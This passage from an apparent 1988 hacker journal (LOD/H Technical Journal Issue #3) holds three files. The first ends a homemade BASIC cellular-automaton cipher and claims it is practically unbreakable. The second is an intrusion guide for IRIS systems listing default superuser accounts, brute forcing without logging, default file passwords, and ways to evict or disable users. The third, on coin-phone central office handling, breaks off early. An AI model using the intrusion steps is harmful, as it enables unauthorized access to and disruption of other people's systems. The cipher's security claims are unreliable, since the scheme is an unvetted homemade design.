IF X$ = TMP$ THEN
|
||
FOUND = 1
|
||
END IF
|
||
POZ = POZ + 1
|
||
IF POZ > QSIZ THEN
|
||
PRINT "Error: Character '";X$"' not in array Q."
|
||
END
|
||
END IF
|
||
END IF
|
||
GOTO TOP
|
||
|
||
REM **********************************************************************
|
||
|
||
End of Program Listing 1
|
||
|
||
This method, while extremely simple, tight, and fast, is not fool-
|
||
proof. Most computers use the following algorithm for generating pseudo-
|
||
random number sequences: x(t+1) = ax(t) + b
|
||
x(t+1) = next random number
|
||
x(t) = previous random number
|
||
a & b are constants that will cause a fairly even distribution
|
||
|
||
For example, if you were using a three-bit system (8 possible postive
|
||
integers) you might make a = 3 & b = 7 (there's a reason behind using prime
|
||
numbers that is beyond the scope of this file.) If you seed the argument with
|
||
RANDOMIZE 5 you would get the following:
|
||
First x: x = 3*5 + 7 | Since we're restricting ourselves to three bits, and
|
||
22 won't fit in three bits, we'd need to perform a modula 8 on the
|
||
number. (Modulo divides x by eight and keeps the remainder as the
|
||
new value of x.) So MOD(22,8) is equal to 6 (16 + 6 = 22).
|
||
|
||
Ok, let's do some simple mapping using our vowel set and the above
|
||
three-bit random number generator. Let's say that the message reads "AAEOU"
|
||
Our first random number was 6. Our map looks like "AEIOU12345". POS(A) + 6
|
||
gives us 2 as the character.
|
||
Second x: x = 3*6 + 7 | MOD (25,8) = 1 | POS(A) + 1 gives us E.
|
||
Third x: x = 3*1 + 7 | MOD (10,8) = 2 | POS(E) + 2 gives us O.
|
||
Fourth x: x = 3*2 + 7 | MOD (13,8) = 5 | POS(O) + 5 gives us 4.
|
||
Fifth x: x = 3*5 + 7 | MOD (22,8) = 6 | POS(U) + 6 wraps around the map to A.
|
||
|
||
So our original "AAEOU" is crytped into "2E04A". This may at first
|
||
seem difficult to crack since 'A' mapped into a '2' on one pass and an 'E' on
|
||
the other, thus preventing a freuquency analysis from breaking the code.
|
||
Unfortunately, if someone knows the random number algorithm, they can
|
||
easily hack out the key. Since most of the people using this will be using it
|
||
on a pc, it would be trivial to get another pc to hack it out. And even if you
|
||
protect your random number algorithm, it is still a straight linear algebra
|
||
problem that an AT could work on over a weekend and probably figure it out,
|
||
especially if there is a fairly small map to work with.
|
||
|
||
Solution: What we need to do is combine the random mapping with a
|
||
random number generator that is tougher to figure out. Enter cellular
|
||
automatons.
|
||
CA's were first invented in the 1940's when John von Neumann (he of
|
||
the famous bottleneck) started to explore the mathmatic implications of very
|
||
simple machines. CA's are made of geometric patterns of cells that change
|
||
their state at each tick of a clock according to a fixed rule. Early work
|
||
provided automatons that could imitate a basic computer. Since the CA's are
|
||
inherently parallel (the entire geometry is updated each clock tick) and easy
|
||
to put on a chip, there is speculation that the next generation of parallel
|
||
processing computers will use CA's as a base rather than the Turing machine
|
||
model.
|
||
You have probably seen a CA at work and not realized it if you've
|
||
ever seen the computer graphic simulation 'LIFE' developed by John Conway at
|
||
MIT to model real organisms. The rule for automaton reproduction was incr-
|
||
edibly simple: If a cell has two or three neighbors, no change in the cell.
|
||
Fewer or more neighbors, it starves or is overcrowded to death, and repro-
|
||
duction occurs when a blank space has exactly three neighbors.
|
||
Using these simple rules, incredibly complex patterns can be produced.
|
||
Anything that can produce complex and varied results from a small algorithm is
|
||
a good target for a random number application. Enter Steven Wolfram from the
|
||
Institute of Advanced Studies in Princeton, NJ.
|
||
Wolfram has been doing research on one-dimensional cellular machines,
|
||
which have the advantage of being able to work with both todays machines and
|
||
future parallel machines. Wolfram has developed an automaton that is a one
|
||
dimensional circular array modified by the rule:
|
||
|
||
a(x,t) = a(x-1,t-1) XOR (a(x,t-1) OR a(x+1,t-1)) MOD k
|
||
|
||
Where x is the position in the array and t is the time,
|
||
k is the number of available characters (k = LEN(Q$)),
|
||
and a is the one-dimensional array.
|
||
|
||
This rule has several interesting properties. The problem we had with
|
||
linear algorithms was that simple algebra could be used to analyze the
|
||
evolution of the algorithm (the patterns produced.) All that you have to do is
|
||
figure out how *one* cell evolves, then apply that pattern across the entire
|
||
array. In the above case, there is no way of analyzing the array at time t
|
||
without loading the initial conditions and running the whole thing.
|
||
The second thing to note is that there are k to the power of w (where w
|
||
is the width (number of cells) in array a) possible states the machine can be
|
||
in, and not all of these states have a predecessor that generates it. These
|
||
states are called 'Garden of Eden' states, and can only occur if they are set
|
||
as an ititial condition.
|
||
As a result, this rule is neither a one-to-one mathmatical mapping,
|
||
nor is it and onto mapping of the set of arrays into itself. In laymans'
|
||
terms, this means that for any given array state it is impossible to tell what
|
||
(if any) previous state generated it by mere pattern analysis.
|
||
While this isn't a file on breaking codes- about the only way to crack
|
||
this one that's been discovered is to load *every* k**w state into memory and
|
||
page through them searching for a pattern. This method can be defeated easily
|
||
by setting w to more than 30 cells (assuming k=256, all the ASCII characters.)
|
||
If you are using my array Q$, you might want to set w to 40 or more. Since 256
|
||
to the 30th power is about a zillion bits, roughly equal to the largest memory
|
||
bank in existence, there isn't much chance of anyone breaking it. For the
|
||
truly paranoid, set w to 50 and sleep easy at night.
|
||
|
||
Anyway, back to the algorithm...
|
||
|
||
Each of the cells is filled on one of the k integers from 0 to k-1,
|
||
giving each cell k possible states. Wolfram found that the string of bits
|
||
occupying the 0 position (a(0,1), a(0,2), a(0,3)...) forms a random sequence
|
||
that passes all statistical tests, sometimes with better results than standard
|
||
DES algorithms.
|
||
Let's break this down and see what it's doing. First of all, we will
|
||
need two arrays. Each array is set up thus:
|
||
|
||
Array for Time One
|
||
|------| |------| |------| |------|
|
||
|---->|a(0,1)|------>|a(1,1)|------>|a(2,1)|----->|a(3,1)|-----|
|
||
| |------| |------| |------| |------| |
|
||
|--------------------------------------------------------------|
|
||
|
||
Array for Time Two
|
||
|------| |------| |------| |------|
|
||
|---->|a(0,2)|------>|a(1,2)|------>|a(2,2)|----->|a(3,2)|-----|
|
||
| |------| |------| |------| |------| |
|
||
|--------------------------------------------------------------|
|
||
|
||
The reason we need two arrays is so you can update the array without
|
||
destroying anything in it. In other words, you start out with array 1 active,
|
||
then you update the array into array 2 and change the active array to 2. On
|
||
the next clock tick you will update the active array (now 2) into the inactive
|
||
one (now 1) and set the active array back to 1. You keep swapping like this.
|
||
Logically, you only have one array- the active one.
|
||
To initialize the array, the ASCII values of each character in the key
|
||
are plugged into the first LEN(KEY$) spaces in the array. If you want to use a
|
||
short key, modify the code to fill the *entire* array with values of the key
|
||
(keep repeating a loop from 1 to W pulling characters out of K). Since the key
|
||
can be anything printable, use something 10-20 characters long that you can
|
||
remember- "HACK TO LIVE, LIVE TO HACK" is one of my favorites. Anyway, if you
|
||
use a short (less than 10) key in this program, the distri- bution will be
|
||
skewed for the first W MOD LEN(KEY$) itereations of the automaton, but will
|
||
smooth out nicely after that.
|
||
After the array is filled, it operates exactly like the first program
|
||
*except* when it need a random number of positions to move. Then it drops
|
||
down, updates each cell in the automaton, and then reads the value in A(0,time)
|
||
as the random number to shift by.
|
||
Let's look at the modified encryption code.
|
||
|
||
REM ************************************************************************
|
||
REM
|
||
REM This is an modification of Program 1 that doesn't use a machine
|
||
REM specific random number generator, but instead uses a cellular automaton
|
||
REM algorithm. W is the width of the actual automaton. A is dimensioned
|
||
REM at 32 to avoid having to reference element 0 of the array, which is
|
||
REM legal on some systems and illegal on the others. This way it can
|
||
REM be implemented on anything. Y is set for time 1, Y1 for time 2.
|
||
REM These correspond to the second dimension in array A.
|
||
REM
|
||
REM ************************************************************************
|
||
|
||
W = 30
|
||
DIM A(32,2)
|
||
Y = 1
|
||
Y1 = 2
|
||
|
||
REM ************************************************************************
|
||
REM
|
||
REM Once again, you can set this up to use files instead of strings. And
|
||
REM note that, unlike the first example, the key doesn't have to be
|
||
REM numeric.
|
||
REM
|
||
REM ************************************************************************
|
||
|
||
INPUT "String to be encoded"; C$
|
||
INPUT "Key Please! (Can be alpha-numeric) ";K$
|
||
|
||
|
||
REM ************************************************************************
|
||
REM
|
||
REM This is where K$ is broken down into a series of characters and their
|
||
REM ASCII value shoved sequentially into array A.
|
||
REM
|
||
REM ************************************************************************
|
||
|
||
FOR I = 1 TO LEN(K$)
|
||
T$ = MID$(K$,I,1)
|
||
A(I,Y1) = ASC(T$)
|
||
NEXT I
|
||
|
||
|
||
REM ************************************************************************
|
||
REM
|
||
REM The only difference between encoding and decoding is which way you
|
||
REM move in your Q$ array space. Encoding takes the original and shifts
|
||
REM to the right, decoding takes the codes value and shifts to the left.
|
||
REM
|
||
REM ************************************************************************
|
||
|
||
REREAD:
|
||
INPUT "Encode or Decode ? ";A$
|
||
A$=LEFT$(A$,1)
|
||
IF A$="E" OR A$="e" THEN
|
||
A=1
|
||
GOTO HEAD
|
||
END IF
|
||
IF A$="D" OR A$="d" THEN
|
||
A=-1
|
||
ELSE
|
||
GOTO REREAD
|
||
END IF
|
||
|
||
REM ************************************************************************
|
||
REM
|
||
REM Q$ contains all the characters that can be encoded. Every encoded
|
||
REM character will be mapped to a character in this array. I haven't
|
||
REM included any non-standard characters, so you will have to customize
|
||
REM it to your particular keyboard/system. I've included an error check
|
||
REM that will abort the encryption if it encounters a character that isn't
|
||
REM in Q$. I have to use the STRING$ command to insert the spacebar and
|
||
REM the quote into the string. It could also be done with a ASC(##) in
|
||
REM many basics. You could expand this to include any non-printable
|
||
REM characters you'd like so you could do non-text files.
|
||
REM
|
||
REM ************************************************************************
|
||
|
||
HEAD:
|
||
SPACE = 32
|
||
QUOTE = 34
|
||
Q$="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
|
||
Q$=Q$+"1234567890!@#$%^&*()-=_+[]$;:'.><,/?X|"
|
||
Q$=Q$+STRING$(1,SPACE)+STRING$(1,QUOTE)
|
||
QSIZ = LEN(Q$)
|
||
|
||
|
||
REM ************************************************************************
|
||
REM
|
||
REM This is the main loop. L = length of the string to encrypt. In this
|
||
REM example, I am only encrypting a single string. Most people who will
|
||
REM actually use this will change the FOR loop to run until an EOF is
|
||
REM encountered in the input file. Since the syntax for that will vary
|
||
REM widely from system to system, I'll leave it out.
|
||
REM
|
||
REM ************************************************************************
|
||
|
||
L=LEN(C$)
|
||
FOR H = 1 TO L
|
||
|
||
REM /* Finds the character I in the input string */
|
||
X$ = MID$(C$,H,1)
|
||
|
||
REM /* Finds the integer location of the character in Q$
|
||
REM returns variable POZ */
|
||
GOSUB LOKPOZ
|
||
|
||
REM /* CELLULAR updates the cells in the automaton, switches the active
|
||
REM time value, and returns X as the number of positions to shift. */
|
||
GOSUB CELLULAR
|
||
|
||
REM /* If you are encoding, you will shift to the right using addition.
|
||
REM you take the modula base QSIZ to keep the new character within
|
||
REM the bounds of Q$. */
|
||
IF A = 1 THEN
|
||
NUPOZ = (POZ + X) MOD QSIZ
|
||
ELSE
|
||
|
||
REM /* Otherwise, you subtract, which takes a bit more math to keep
|
||
REM up with. Once you have the distance to shift, you must
|
||
REM convert it to a positive integer and then subtract two to
|
||
REM account for the head & tail of the array. */
|
||
NUPOZ = (POZ - X) MOD QSIZ
|
||
NUPOZ = NUPOZ - 2
|
||
IF NUPOZ < 1 THEN
|
||
NUPOZ = QSIZ - ABS(NUPOZ)
|
||
END IF
|
||
END IF
|
||
|
||
REM /* Now you assign the new character in array Q$ to Y$, and append
|
||
REM it to your converted string */
|
||
IF NUPOZ < 1 THEN
|
||
NUPOZ = QSIZ - ABS(NUPOZ)
|
||
END IF
|
||
Y$ = MID$(Q$,NUPOZ,1)
|
||
D$ = D$ + Y$
|
||
NEXT H
|
||
|
||
PRINT "Original = ";C$
|
||
PRINT "Modified = ";D$
|
||
END
|
||
|
||
REM /* This finds character X$ in array Q$ and returns an integer
|
||
REM value of the location. Called from the main loop. */
|
||
LOKPOZ:
|
||
FOUND = 0
|
||
POZ = 1
|
||
TOP:
|
||
IF FOUND = 1 THEN
|
||
RETURN
|
||
ELSE
|
||
TMP$ = MID$(Q$,POZ,1)
|
||
IF X$ = TMP$ THEN
|
||
FOUND = 1
|
||
END IF
|
||
POZ = POZ + 1
|
||
IF POZ > QSIZ THEN
|
||
PRINT "Error: Character '";X$"' not in array Q."
|
||
END
|
||
END IF
|
||
END IF
|
||
GOTO TOP
|
||
|
||
REM ***********************************************************************
|
||
REM
|
||
REM This is the cellular automaton
|
||
REM
|
||
REM ***********************************************************************
|
||
|
||
CELLULAR:
|
||
|
||
REM /* Goes through the loop updating into the inactive time (1 or 2 dep-
|
||
REM ending on how Y and Y1 are assigned) */
|
||
FOR I = 1 TO W
|
||
A(I,Y) = A(I-1,Y1) XOR (A(I,Y1) OR A(I+1,Y1))
|
||
NEXT I
|
||
|
||
REM /* Updates the ends of the array (logical positions 0 and 31) that
|
||
REM are used in calculating other fields. */
|
||
A(0,Y) = A(W+1,Y1) XOR (A(0,Y1) OR A(1,Y1))
|
||
A(W+1,Y) = A(W,Y1) XOR (A(W+1,Y1) OR A(0,Y1))
|
||
|
||
REM /* Assigns the first cell to X as a random number */
|
||
X = A(1,Y)
|
||
|
||
REM /* Flips the active time */
|
||
TMP = Y
|
||
Y = Y1
|
||
Y1 = TMP
|
||
|
||
RETURN
|
||
|
||
Ok, let's trace through a *small* example. Assume our earlier
|
||
map of "AEIOU12345" and an automaton of width 5. For a key, we'll use
|
||
"A15".
|
||
|
||
1) Assign ASC(A) to a(1,1), ASC(1) to a(2,1), ASC(5) to a(3,1).
|
||
("0" will represent an empty cell in this example.)
|
||
A(time 1) = 0 65 49 53 0 0 0
|
||
(Remember that an array of width 5 is going to have 7 actual elements)
|
||
|
||
2) Now then, we want to encrypt the string "EE3"
|
||
First, we locate where E is in our map. LOKPOZ("E") = 2
|
||
|
||
3) Now then, we update the automaton.
|
||
a(1,2) = 0 XOR (65 OR 49)
|
||
a(2,2) = 65 XOR (49 OR 53)
|
||
a(3,2) = 49 XOR (53 OR 0)
|
||
a(4,2) = 53 XOR (0 OR 0)
|
||
a(5,2) = 0 XOR (0 OR 0)
|
||
|
||
Since this isn't a tutorial on binary numbers and boolean algebra, you'll
|
||
have to trust me on this one...
|
||
|
||
a(1,2) = 113
|
||
a(2,2) = 116
|
||
a(3,2) = 4
|
||
a(4,2) = 53
|
||
a(5,2) = 0
|
||
|
||
4) Now we update the ends.
|
||
a(0,2) = 0 XOR (0 OR 65)
|
||
a(6,2) = 0 XOR (0 OR 0)
|
||
|
||
Again...
|
||
a(0,2) = 65
|
||
a(6,2) = 0
|
||
|
||
5) Now we switch the active time from 1 to 2, and our new automaton is
|
||
a(time 2) = 65 113 116 4 53 0 0
|
||
|
||
6) We then pull off a(1,2) as the number to shift by.
|
||
|
||
7) Postion 2 + 113 (we're encoding, so we add) is 5 (modulo arithmatic.)
|
||
|
||
8) "E" is encoded into "U".
|
||
|
||
9) We repeat this two more times (you don't really want me to step through
|
||
it all, do you?) and end up with the encrypted version.
|
||
|
||
Well, that's going to pretty much wrap this file up. If you are
|
||
interested in more files of this nature, let me know. If you find this totally
|
||
confusing, but want to learn more, call The Phoenix Project at 512/441-3088
|
||
(300/1200/2400, 24 hours a day). Our friendly and helpful LOD/H staff will be
|
||
glad to assist you. Other people who you might want to talk to about
|
||
encryption include Dr. Cypher, Tuc, and Prime Suspect.
|
||
Also, if you are interested in seeing the above algorithm applied in
|
||
other languages let me know. If there's enough of a demand I'll release C,
|
||
Modula-2, and ADA versions.
|
||
|
||
This has been a Legion of Doom/Legion of Hackers presentation!
|
||
|
||
The Mentor
|
||
LOD/H
|
||
|
||
*****************************************************************************
|
||
References and Acknowledgments:
|
||
|
||
"How to Generate Cryptographically Strong Sequences of Pseudo-Random Bits";
|
||
M. Blum & S. Micali; SIAM Journal of Computing, vol. 13, p. 850 (1984)
|
||
|
||
"Functions of Random Variables"; John Freund & Ronald Walpole;
|
||
Mathmatical Statistics, 4th Edition; Prentice-Hall Inc., NJ; pp. 240-71
|
||
|
||
"Building an Encryption System"; Peter Wayner
|
||
Computer Language, Vol. 4, Num. 12, p. 67 (Dec. 1987 Issue)
|
||
|
||
"Random Sequence Generation by Cellular Automata"; Institute for Advanced
|
||
Study; Advances in Applied Mathmatics;
|
||
|
||
"Breaking Pseudo-Random Number Based Cryptographic Algorithms"; M. Vahle &
|
||
L. Tolendino; CRYPTOLOGIA, Oct 1982, p. 319
|
||
|
||
Also my thanks to: TUC, The Leftist, Prime Suspect, and Dr. Cypher, who all
|
||
contributed to this one way or another.
|
||
|
||
***************************************************************************
|
||
|
||
|
||
The LOD/H Technical Journal, Issue #3: File 07 of 10
|
||
|
||
IIIIIIIIII RRRRRRRRRR IIIIIIIII SSSSSSSSSS
|
||
II RR RR II SS SS
|
||
II RR RR II SS
|
||
II RRRRRRRRR II SSSSSSSSS
|
||
II RR RR II SS
|
||
II RR RR II SS SS
|
||
IIIIIIIIII RR RR IIIIIIIII SSSSSSSSS
|
||
|
||
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
|
||
| |
|
||
# Introduction to The Iris Operating System #
|
||
| |
|
||
# by #
|
||
| |
|
||
# The Leftist #
|
||
| |
|
||
# The Legion of Doom/Hackers #
|
||
| |
|
||
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
|
||
|
||
IRIS
|
||
<INTERACTIVE REAL TIME INFORMATION SYSTEM>
|
||
|
||
Iris is an operating system which most people have heard little or nothing
|
||
about. Many Businesses across the country are starting to use computers which
|
||
support the IRIS operating system. IRIS is not new though, it was originally
|
||
written to run on PDP-11, Data General, and Royal Systems. IRIS has grown in
|
||
popularity due to the major revisions which have been made over the years and
|
||
is a fairly easy system for anyone to learn. This article, though not a
|
||
complete guide to IRIS, will give you the basic knowledge neccesary to
|
||
identify, enter, and access information once in.
|
||
|
||
|
||
Finding IRIS
|
||
------------
|
||
|
||
You'll know you've found an IRIS system by its login banner, which usually
|
||
looks like this:
|
||
|
||
Welcome to "IRIS" R9.1.4 timesharing
|
||
|
||
This is Dr. BOB'S OFFICE!
|
||
|
||
ACCOUNT ID?
|
||
|
||
|
||
Logging in
|
||
----------
|
||
|
||
To log into an IRIS system after connecting <at 7E1 usually> press the
|
||
escape key. You should get a message asking for account ID at which point you
|
||
would enter your ID followed by a c/r. You're in the system when you get a #
|
||
prompt. If you've entered an incorrect ID, the normal error message would be:
|
||
|
||
INVALID
|
||
|
||
The nice thing about IRIS from a hacker point of view is that it will allow
|
||
you to brute force hack your way in, never keeping a log of unsuccessful
|
||
tries, and never hanging up on you.
|
||
If you don't think your ID is being entered properly, you can turn the
|
||
echo back on by first hitting a Control-E. If you suspect parity trouble on
|
||
your login <ie: the E key beeps every time you hit it> try hitting a Control-P
|
||
to change the parity.
|
||
|
||
Default Accounts
|
||
----------------
|
||
|
||
Try the account names below, and also try them with 1 or 2 spaces after them in
|
||
upper and lower case.
|
||
|
||
|
||
ACCOUNT COMMENTS Privelege level
|
||
DDDDDDD DDDDDDDDDDDDDDDDDDDDDDDDDD DDDDDDDDDDDDDDDDDDDDDDDDDD
|
||
MANAGER < works 99% of the time > 3 full system priv's
|
||
|
||
BOSS < manager account > 3 full system priv's
|
||
|
||
SOFTWARE < software dept account > 2 general user access
|
||
|
||
DEMO < demonstration account > 1 scum of the earth priv's
|
||
|
||
PDP8 < always on rev 7.0 > 3 full system priv's
|
||
|
||
PDP11 < always on rev 7.0 > 3 full system priv's
|
||
|
||
ACCOUNTING < accounting dept. > 2 general user
|
||
|
||
Also try the company's name, or its intials. Sometimes system operators
|
||
place control characters in their ID's, or spaces <usually one, sometimes two>
|
||
at the end of their account names, this security 'trick' is used due to the
|
||
operating system not asking for passwords. Like PRIMOS version 18 systems, all
|
||
you needed was a valid username to get in. There are plans of implementing
|
||
passwords in the future for IRIS.
|
||
|
||
|
||
YOU'RE IN!
|
||
----------
|
||
|
||
So you're in- hopefully with full priv's.
|
||
|
||
The users Privilege Level may be 0, 1, 2, or 3 indicating General,
|
||
Privileged, Manager, or Superuser privileges respectively. Only the Superuser
|
||
account can access the ACCOUNTS file, but all level two accounts are given
|
||
most other privileges that a level 3 account have.
|
||
|
||
If you were able to log in with a privilege level of 3, you'll be allowed
|
||
to run the program ACCOUNTUTILITY or ACCOUNTS, depending on the version of
|
||
IRIS is running. This is almost always found on LU 0, along with all the
|
||
other system utilities. ACCOUNTUTILITY is menu driven, and you should have no
|
||
problem using it.
|
||
|
||
Accounts File
|
||
-------------
|
||
|
||
The Accounts File contains the following information
|
||
|
||
Account ID
|
||
Assigned priority
|
||
Assigned Logical Unit #
|
||
Account# <Group and User>
|
||
Alloted CPU time <in seconds>
|
||
Alloted disk blocks
|
||
Number of disk blocks in use
|
||
Peak # of disk blocks in use
|
||
Net File Charges
|
||
|
||
|
||
ACCOUNTUTILITY
|
||
--------------
|
||
|
||
This program is for editing the accounts on the system. You must be a
|
||
manager on the system <level 3> to run this program, or else have a way to
|
||
change the protection of BOTH the accounts file, and the ACCOUNTUTILITY
|
||
program. If this is done, anyone can run the program. After typing
|
||
ACCOUNTUTILITY you'll get the following menu:
|
||
|
||
ACCOUNTS FILE MAINTENANCE REV 2.2
|
||
|
||
(0) EXIT TO SYSTEM
|
||
(1) ADD NEW ACCOUNT
|
||
(2) MODIFY ACCOUNT
|
||
(3) DELETE ACCOUNT
|
||
(4) INQUIRE ACCOUNT
|
||
(5) LIST THE ACCOUNTS
|
||
|
||
ENTER FUNCTION NUMBER:
|
||
|
||
It's all pretty straightforward, I don't think I need to go on about this
|
||
feature...
|
||
|
||
What to do Inside
|
||
-----------------
|
||
|
||
The first thing you want to do once inside IRIS is to issue the command PP
|
||
which will show you who's on, and what they're currently doing. Sometimes PP
|
||
has been renamed to PORT ALL MONITOR. If you logged in and it said your
|
||
Logical Unit was not active, you must install the system under the MANAGER
|
||
account. To do this, log in on a full privs account, and type IN, INSTALL, or
|
||
FASTINSTALL. This should allow you to activate all the system's Logical
|
||
Units. Normally, the Logical Units (referred to as LU's) range from 0-99, 99
|
||
being a ramdrive. If you choose to just install Logical Unit number one, the
|
||
command would be INSTALL 0.1 and so on. If you are told Logical Unit x
|
||
exists, change? DO NOT CHANGE IT! Instead, attempt to install a Logical Unit
|
||
that doesn't already exist.
|
||
|
||
To list all the files on the Logical Unit assigned to your account, type LIBR.
|
||
To list only certain files type LIBR x where x = searchcriteria.
|
||
To list the files on another LU, type LIBR x/ where x = the LU number.
|
||
To list all the files that you have read access to, type LIBR @.
|
||
To list only files that belong to you, type LIBR @g,r where g is your group,
|
||
and u is your user #.
|
||
To list files accessed within h hours, type LIBR >h where h is a decimal #.
|
||
|
||
Anyway, you'll see something like this:
|
||
|
||
#LIBR
|
||
|
||
LOGICAL UNIT #0 JUL 30, 1988 19:50:03
|
||
|
||
* FILENAME[VOL] PROT COST SIZE ACCOUNT AGE HSLA TYPE PRIV HBA
|
||
S ASM 33 $0.00 11 0, 1 11068 11068 401 3 400
|
||
B RUN 33 $0.00 21 0, 1 11068 0 602 3 344
|
||
T SU.DSUBS 22 $0.00 22 0, 1 11068 5 30 3 7
|
||
|
||
and so on....
|
||
|
||
Running Programs
|
||
----------------
|
||
|
||
Most Application Software for IRIS is written in business basic, which is
|
||
basic with extended functions specifically for business applications.
|
||
|
||
To execute a runnable file at the # prompt, just type the file's name.
|
||
To exit into basic, just type BASIC.
|
||
To run a program, simply type its name.
|
||
To load a program type BASIC LOAD x where x = filename.
|
||
To list a program once in basic, type X LIST X where, in both cases X = the
|
||
line you want to list or simply type LIST to list all the lines of the
|
||
program.
|
||
|
||
File Type Chart
|
||
|
||
Number Letter File Type
|
||
|
||
0 P Permanent System File
|
||
1 S System processor or file
|
||
2 B BASIC processor or program
|
||
3 A Stand alone processor or program
|
||
4 X EXECUTE processor or program
|
||
5 G GPM program
|
||
6 M MUMPS processor or program
|
||
7 W COURSE WRITER processor or program
|
||
20 Q Stand alone compiler
|
||
21 J Stand alone relocating assembler
|
||
22 L Stand alone relocatable loader
|
||
23 R Relocatable binary object tape image
|
||
24 I Indexed relocatable binary library
|
||
27 Z Temporary file
|
||
30 T Text file
|
||
31 F Formatted data file
|
||
32 C Contiguous data file
|
||
36 $ Peripheral device driver
|
||
|
||
Passworded Files
|
||
----------------
|
||
|
||
Sometimes a password will be added to the end of a file name to limit
|
||
access to users who have knowledge of the password. To access a passworded
|
||
file, type the following: FILEX ^Epass^E
|
||
|
||
The ^E is correctly represented as Control-E. The common defaults for
|
||
passworded files <especially on LU0> are the letter X and the word THINK.
|
||
|
||
|
||
Kicking Users off the System
|
||
----------------------------
|
||
|
||
This is something you do not want to do unless an emergency situation
|
||
arises, in which case you would issue the PPP command. This is the port
|
||
eviction utility. It will then ask you which port you would like to evict or
|
||
you may type the word ALL to evict everyone but yourself. This is useful if
|
||
you hang a printer port, or are afraid you may have dumped data to a printer
|
||
which is offline.
|
||
|
||
|
||
PORT.STAT
|
||
---------
|
||
|
||
This command gives you the status of a given port, and its channels. to
|
||
run it type:
|
||
|
||
PORT.STAT
|
||
|
||
|
||
PP
|
||
--
|
||
|
||
PP lets you see who is on the system, what port they're on, what baud rate
|
||
they're running, and what process they're running. Just type PP from the #
|
||
prompt. IRIS will give you information about the ports on the system and then
|
||
will ask you if you would like channel status. Either type in the channel that
|
||
you wish to see the status of, or hit return to exit.
|
||
|
||
|
||
GAMES
|
||
-----
|
||
|
||
Yes, there are even games on IRIS, all the old PDP games hunt the wumpus,
|
||
tic-tac-toe, etc...sure to provide hours of amusement.
|
||
|
||
|
||
Changing the Baud Rate of a Port
|
||
--------------------------------
|
||
|
||
To change a port's baud rate, type PORT BAUD x where x is a standard baud
|
||
rate <110,300,600,1200,2400,9600,19200>. Don't change the baud rate of the
|
||
port you are on. This command is useful for temporarily disabling a user.
|
||
|
||
|
||
Copying Files
|
||
-------------
|
||
|
||
Copy is a general purpose command for moving data of any type from a
|
||
specified source to a specified destination. Also, data from several sources
|
||
can be merged into one destination file.
|
||
|
||
The general form of the copy command is:
|
||
|
||
Copy dest = Source1,Source2 etc....
|
||
|
||
Where dest is the filename under which the destination file is to be built.
|
||
|
||
|
||
Mail
|
||
----
|
||
|
||
To mail a one line message to another port, the following command applies:
|
||
|
||
MAIL p "Hello My name is Joe Comosolo" where p = the port # to mail to.
|
||
|
||
|
||
Loading Text Files
|
||
------------------
|
||
|
||
A text file can be loaded by use of the command:
|
||
|
||
EDIT SFILE,DFILE
|
||
an exclamation mark must be used to copy over an existing file.
|
||
|
||
A new text file may be created by typing:
|
||
EDIT,Filename
|
||
|
||
If you just want to examine a text file, then just type
|
||
EDIT Filename
|
||
|
||
Some systems also have the TYPE filename command.
|
||
|
||
|
||
BYELOG
|
||
------
|
||
|
||
This command allows you to edit the login message you receive before you are
|
||
prompted for your account id. The syntax is:
|
||
|
||
BYELOG message to be printed
|
||
|
||
|
||
Logging Off
|
||
-----------
|
||
|
||
>From the # prompt, type BYE and hit return.
|
||
|
||
|
||
Conclusion
|
||
----------
|
||
|
||
I hope that article file proves useful. Keep it in your archives for the
|
||
next time you stumble onto an IRIS system. If you have any questions, comments,
|
||
or gripes, I can be reached on The Phoenix Project at 512/441-3088.
|
||
|
||
|
||
The LOD/H Technical Journal, Issue #3: File 08 of 11
|
||
|
||
|
||
__________________________________________________________
|
||
@@ @@
|
||
@@ Coin Service, The Central Office, and You @@
|
||
@@ @@
|
||
@@ by @@
|
||
@@ @@
|
||
@@ Phase Jitter @@
|
||
@@ @@
|
||
@@ Legion of Doom! @@
|
||
@@______________________________________________________@@
|
||
|
||
|
||
In this file I will attempt to give a basic overview of how various
|
||
central offices handle coin service. If you feel your interest grows due to
|
||
this file there are other good technical documents about coin service, i.e.
|
||
Bell System Practices, CDs, PDs ect..
|
||
|
||
|
||
Coin service is differentiated from other services by a special class of
|
||
service. All switching systems give -48 volt battery toward the coin phone on
|
||
the ring side of the line. Coin-First lines have an open TIP during a normal
|
||
receiver-on-hook condition. When a line goes off hook the central office
|
||
takes no action and in fact can not detect the off hook condition due to the
|
||
line's conditioning-for-ground start. When the customer deposits money the
|
||
coin ground is extended to the ring side of the line. The ground signals the
|
||
line equipment in the central office as a to give a dial tone.
|
||
Dial-Tone First offices give both the battery and ground to the coin
|
||
station, thus providing a dial tone equivalent to a POTS phone. All coin
|
||
service is super current sensitive. (The central office must give at least 23
|
||
milliamps of line current and 41 milliamps of coin control current to the
|
||
farthest coin station.)
|
||
|
||
|
||
The switching systems differ in the method which calls are handled.
|
||
|
||
|
||
No. 5 Crossbar
|
||
|
||
The No. 5 crossbar coin-first offices must have a dual wound line relay
|
||
with both windings in series when dealing with a coin first situation. If any
|
||
Coin-First lines are served in a No. 5 crossbar office the originating
|
||
registers must be able to desensitize the (pulsing) L relay by providing a
|
||
resistive ground throgh its tertiary winding via the coin class of service
|
||
relay.
|
||
Crossbar offices can give coin return from Originating Registers,
|
||
TSPS/Cordboard trunks, Ring and Tone trunks, Announcement trunks, and Coin
|
||
Supervisory circuits. Coin collect current is only given through
|
||
TSPS/Cordboard trunks and Coin Supervisory circuits. The only circuit that
|
||
can handle a stuck coin test is the coin supervisory circuit.
|
||
Crossbar offices handle coin actions on locally completed calls in the
|
||
coin supervisory circuit (CS). All trunks must have access to the CS circuit
|
||
or use coin junctors or coin 1A0 trunks that have such access. The use of
|
||
coin junctors or coin 1A0 trunks elimnate the need for other trunks to be hard
|
||
wired to the Coin Supervisory Link. When the trunk's supervisory relays show
|
||
a coin action is needed the trunk searches for an idle Coin Supervisory
|
||
Circuit through the Coin Supervisory Link. The bridged connection allows the
|
||
Coin Supervisory Circuit to give the proper collect or return current toward
|
||
the coin telephone and test to see if the action was successful.
|
||
Crossbar offices handle coin actions required by DDD calls or TSPS
|
||
operators in the No. 5 crossbar TSPS trunk. The TSPS base unit signals the
|
||
